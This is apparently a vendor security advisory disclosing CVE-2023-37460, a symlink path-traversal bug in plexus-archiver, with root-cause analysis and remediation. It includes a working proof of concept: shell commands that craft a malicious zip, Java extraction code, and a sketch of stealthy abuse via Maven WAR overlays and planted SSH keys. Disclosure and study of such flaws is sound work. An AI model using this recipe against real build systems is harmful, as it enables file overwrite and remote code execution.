Arbitrary File Creation vulnerability in plexus-archiver – CVE-2023-37460

plexus-archiver - CVE-2023-37460The JFrog Security research team constantly monitors open-source projects to find new vulnerabilities or malicious packages and share them with the wider community to help improve their overall security posture. As part of this effort, the team recently discovered a new security vulnerability in plexus-archiver, an archive creation and extraction package. plexus-archiver is used in many packages, one of them is maven-war-plugin which is used while running “mvn package” in order to create a WAR file.

The JFrog Security Research team responsibly disclosed the vulnerability and worked with plexus-archiver’s maintainers on verifying the fix.

Back in 2018, a ZipSlip vulnerability was discovered and fixed in plexus-archiver. ZipSlip vulnerability happens when extracting an archive and allowing entries with “../” in their names to be written into the filesystem, causing an arbitrary file write outside of the extraction directory. It turns out that even after the fix, plexus-archiver was still vulnerable to a similar attack, as we will see soon.

CVE ID Description Potential Impact CVSSv3.1 Score
CVE-2023-37460 Path traversal in AbstractUnArchiver when extracting a malicious archive RCE 8.1

 

CVE-2023-37460 can be exploited by extracting a malicious archive that contains a symlink to a path outside of the extraction directory. By triggering the vulnerability, an attacker can create an arbitrary file (that didn’t already exist), which can cause a remote code execution.

Technical Details

In AbstractUnArchiver.java:

protected void extractFile( final File srcF, final File dir, final InputStream compressedInputStream, String entryName, final Date entryDate, final boolean isDirectory, final Integer mode, String symlinkDestination, final FileMapper[] fileMappers)
    throws IOException, ArchiverException
    {
        ...
        // Hmm. Symlinks re-evaluate back to the original file here. Unsure if this is a good thing...
        final File targetFileName = FileUtils.resolveFile( dir, entryName );
        ...
        Path canonicalDirPath = dir.getCanonicalFile().toPath();
        Path canonicalDestPath = targetFileName.getCanonicalFile().toPath();


        if ( !canonicalDestPath.startsWith( canonicalDirPath ) )
        {
            throw new ArchiverException( "Entry is outside of the target directory (" + entryName + ")" );
        }


        try
        {
            ...
            if ( !StringUtils.isEmpty( symlinkDestination ) )
            {
                SymlinkUtils.createSymbolicLink( targetFileName, new File( symlinkDestination ) );
            ...
            else
            {
                try ( OutputStream out = Files.newOutputStream( targetFileName.toPath() ) )
                {
                    IOUtil.copy( compressedInputStream, out );
                }
            }
            ...

When given an entry that already exists in dir as a symbolic link whose target does not exist – the symbolic link’s target will be created and the content of the archive’s entry will be written to it.

That’s because the way FileUtils.resolveFile() works, after some processing of the directory and the file, it calls file.getCanonicalFile() with the full file path.

Although File.getCanonicalFile() guarantees “resolving symbolic links”, it behaves a little differently than you might expect. File.getCanonicalFile() will eventually call JDK_Canonicalize():

JNIEXPORT int
JDK_Canonicalize(const char *orig, char *out, int len)
{
    ...
    /* First try realpath() on the entire path */
    if (realpath(orig, out)) {
        /* That worked, so return it */
        collapse(out);
        return 0;
    } else {
        /* Something's bogus in the original path, so remove names from the end
           until either some subpath works or we run out of names */
    ...

realpath() returns the destination path for a symlink, if this destination exists. But if it doesn’t –

it returns NULL and we will reach the else’s clause, which eventually will return the path of the symlink itself.

In case the entry already exists as a symbolic link to a non-existing file – file.getCanonicalFile() will return the absolute path of the symbolic link and this check will pass:

Path canonicalDirPath = dir.getCanonicalFile().toPath();
Path canonicalDestPath = targetFileName.getCanonicalFile().toPath();


if ( !canonicalDestPath.startsWith( canonicalDirPath ) )
{
    throw new ArchiverException( "Entry is outside of the target directory (" + entryName + ")" );
}

Later, the content of the entry will be written to the symbolic link’s destination and by doing so will create the destination file and fill it with the entry’s content.

Arbitrary file creation can lead to remote code execution. For example, if there is an SSH server on the victim’s machine and ~/.ssh/authorized_keys does not exist – creating this file and filling it with an attacker’s public key will allow the attacker to connect the SSH server without knowing the victim’s password.

PoC Exploit

We created a zip as follows:

$ ln -s /tmp/target entry1
$ echo -ne “content” > entry2
$ zip  --symlinks archive.zip entry1 entry2

The following command will change the name of entry2 to entry1:

$ sed -i 's/entry2/entry1/' archive.zip

We put archive.zip in /tmp and create a dir for the extracted files:

$ cp archive.zip /tmp
$ mkdir /tmp/extracted_files

Next, we wrote a java code that opens archive.zip:

package com.example;

import java.io.File;

import org.codehaus.plexus.archiver.zip.ZipUnArchiver;

public class App 
{
    public static void main( String[] args )
    {
        ZipUnArchiver unArchiver = new ZipUnArchiver(new File("/tmp/archive.zip"));
        unArchiver.setDestDirectory(new File("/tmp/extracted_files"));
        unArchiver.extract();        
    }
}

After running this java code, we can see that /tmp/target contains the string “content”:

$ cat /tmp/target
content

Notice that although we used here a duplicated entry name in the same archive, this attack can be performed also by two different archives – one that contains a symlink and another archive that contains a regular file with the same entry name as the symlink.

Maven and plexus-archiver

plexus-archiver is being used in maven-war-plugin when packaging a WAR file.

A WAR file is a compressed archive that contains a web app. The web app may contain java classes, shared objects (or DLLs) and JSP pages.

One can configure maven-war-plugin to combine couple of WARs into one WAR by adding overlays element into the plugin configuration, for example:

<plugin>
  <groupId>org.apache.maven.plugins</groupId>
  <artifactId>maven-war-plugin</artifactId>
  <version>3.4.0</version>
  <configuration>
    <overlays>
      <overlay>
          <groupId>group-id</groupId>
          <artifactId>war-</artifactId>
          <type>war</type>
      </overlay>
    </overlays>
  </configuration>
</plugin>

Also, the packaging type in pom.xml should be “war”:

<packaging>war</packaging>

Then, the packaging can be done by:

$ mvn package

As it turns out, maven-war-plugin uses plexus-archiver when extracting the WARs that are  mentioned in the overlays element:

protected void doUnpack(WarPackagingContext context, File file, File unpackDirectory)
        throws MojoExecutionException {
    String archiveExt = FileUtils.getExtension(file.getAbsolutePath()).toLowerCase();

    try {
        UnArchiver unArchiver = context.getArchiverManager().getUnArchiver(archiveExt);
        unArchiver.setSourceFile(file);
        unArchiver.setDestDirectory(unpackDirectory);
        unArchiver.setOverwrite(true);
        unArchiver.extract();
    } catch (ArchiverException e) {
        throw new MojoExecutionException(
                "Error unpacking file [" + file.getAbsolutePath() + "]" + " to ["
                        + unpackDirectory.getAbsolutePath() + "]",
                e);
    } catch (NoSuchArchiverException e) {
        context.getLog()
                .warn("Skip unpacking dependency file [" + file.getAbsolutePath() + " with unknown extension ["
                        + archiveExt + "]");
    }
}

That means that running “mvn package” might be dangerous when one of the overlaid WAR files is malicious.

This allows attackers to have stealthier payload which doesn’t rely on well-known hijack techniques such as “maven-site-plugin”, “groovy-maven-plugin” and more. This stealthier payload is extremely unlikely to be detected by automated security scanners, and is even quite unlikely to be detected in a manual audit.

Remediation Recommendations

To fix the issues, update plexus-archiver to the 4.8.0 version or later.

Are JFrog products vulnerable?

JFrog products are not vulnerable to this issue, since they do not use plexus-archiver.

Acknowledgement

We would like to thank the plexus-archive team for promptly and professionally handling this issue.

Learn More

In addition to exposing new security vulnerabilities and threats, JFrog provides developers and security teams easy access to the latest relevant information for their software with automated security scanning. JFrog customers using JFrog Curation are already protected against CVE-2023-37460 (as other CVEs that are marked as critical).

Questions? Thoughts? Contact us at research@jfrog.com for any inquiries.